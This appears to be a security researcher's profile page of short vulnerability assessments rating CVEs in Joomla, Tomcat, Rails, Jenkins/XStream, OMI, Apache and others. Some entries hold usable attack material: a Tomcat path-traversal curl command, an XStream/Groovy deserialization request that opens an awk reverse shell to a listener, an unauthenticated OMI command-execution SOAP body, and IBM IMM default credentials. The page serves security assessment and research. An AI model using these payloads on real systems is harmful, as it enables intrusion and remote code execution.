noraj (85)

Last Login: July 30, 2023
Assessments
36
Score
85

noraj's Latest (20) Contributions

Sort by:
Filter by:
1
Ratings
Technical Analysis

The XXE is in a function (Xml::parse) that is part of the core library but is not used directly in the CMS. So to be vulnerable, one has to have made a custom page or installed an extension using this vulnerable function.
Else it’s pretty handy and is present in nearly all versions of the CMS until the patch.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

The version of Dell EMC iDRAC8 or Dell EMC iDRAC9 prior to 2.83.83.83/5.10.30.00 are vulnerable to this. Dell advisory.

1
Ratings
Technical Analysis

No known public exploit.

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very Low
Technical Analysis

No known public exploit.

1
Ratings
Technical Analysis

It should be easy to exploit but there is no known public exploit.

1
Ratings
Technical Analysis

It’s hard to find a SH4 architecture gcc compilation toolchain outside of debian / ubuntu. Cross compilation make it uneasy to compile the payload.

1
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

Useful to access to Tomcat manager that is normally exposed only on localhost, eg.

curl http://example.org/..\;/manager/html --path-as-is
3
Ratings
Technical Analysis

It’s easy to weaponize, even manually but there are dozens of exploits available. There is a TryHackMe room about CVE-2022-26134 to practice in a lab environment.

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Despite the CVE being registered for Wordpress, fckeditor is embedded in many CMS or custom applications and as such can impact more applications. However, fckeditor provides connectors for ASP, PHP, etc. but not JSP for example. So a Java app using fckeditor may be not vulnerable even with a vulnerable fckeditor.

1
Ratings
Technical Analysis

There are at least two ways to achieve RCE.

Vector n°1

It leaks the MySQL credentials, in default and most common configurations MySQL will be exposed only on 127.0.0.1 which make the attack ineffective. But if the database is exposed publicly, the attacker can change the Joomla! Super User’s password. The attacker logs in administrative web interface and modify a template to include a webshell or install a malicious plugin.

Vector n°2

It leaks the Joomla user database (usernames, emails, assigned group). The attacker can target a Super user and try bruteforce or credentials stuffing, then follows previously showcased paths to code execution.

1
Ratings
Technical Analysis

It has been proven working well on production domains (cf. https://twitter.com/an0n_r0/status/1589405818885398528). kpasswd support is being implemented in impacket and the vuln will be exploitable with ticketer.
Note : this vulnerability concerns Samba AD and not MS AD.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

This vulnerability is old now and targets old version of Rails. But if you face such an app it’s really easy to get RCE using an existing PoC. However, editing the YAML manually can be difficult because it’s very space sensitive.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Medium
Technical Analysis

It’s easy to get RCE with a Groovy payload. Your code will be executed even if you receive an HTTP 500 error.

Example of request / payload:

POST /createItem?name=example HTTP/1.1
Host: example.org
Content-Length: 689
Content-Type: application/xml;
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando"/>
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>awk</string>
                <string>'BEGIN {s = "/inet/tcp/0/192.168.1.14/9999"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'</string>
                <string>/dev/null</string>
              </command>
            </owner>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>
1
Ratings
Technical Analysis

The only file you can rely on for detection is /WEB-INF/web.xml, but to read something else you’ll have to know the directory structure which is unlikely when you audit a client infrastructure. To achieve RCE you’ll be required to get file upload which is also less likely. In many cases in real life it may end not useful outside proving the vulnerability exists.
There are still some chances you can read /RELEASE-NOTES.txtif you don’t have another mean to know the version used.

If the application is deployed under an unguessable path it’s likely you won’t be able to go further but if you can reach to the app and browse it’ll may be able to understand paths and try to read the source code of the application.

1
Ratings
Technical Analysis

IBM Integrated Management Module (IMM) have some default admin credentials (USERID / PASSW0RD). The default credentials are working on the WebUI as well as on telnet and SSH that are accessible by default. The vulnerability allows to inject system commands. However the big tradeoff is that the exploit is not public.

2
Ratings
Technical Analysis

It gives GLPI version, the list of all plugins and their version, and some system info like the database used and its version, sometimes the webserver engine, the PHP version and the list of all PHP modules loaded, the OS distro and version + the kernel name and version.

2
Ratings
Technical Analysis

iTop is a common ITIL software, it gives access to tons of information on the IT department, IP ranges, machine information, support tickets, username, it’s often plugged to AD LDAP, etc. Having RCE on the server allows to read configuration files containing LDAP service account credentials, retrieve local users password hashes for password spraying, obtain web admin credentials to access the information gold mine, etc.
Any low privilege account will work for the exploit, in general every employee have an account.

1
Ratings
Technical Analysis

It is exposing PII (Personally Identifiable Information) from registered events in the calendar but also usernames and password hashes for offline crack.

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

HackTricks

The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user.

By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
   ...
   <s:Body>
      <p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
         <p:command>id</p:command>
         <p:timeout>0</p:timeout>
      </p:ExecuteShellCommand_INPUT>
   </s:Body>
</s:Envelope>
1
Ratings
Technical Analysis

Qualys says:

CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.

The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50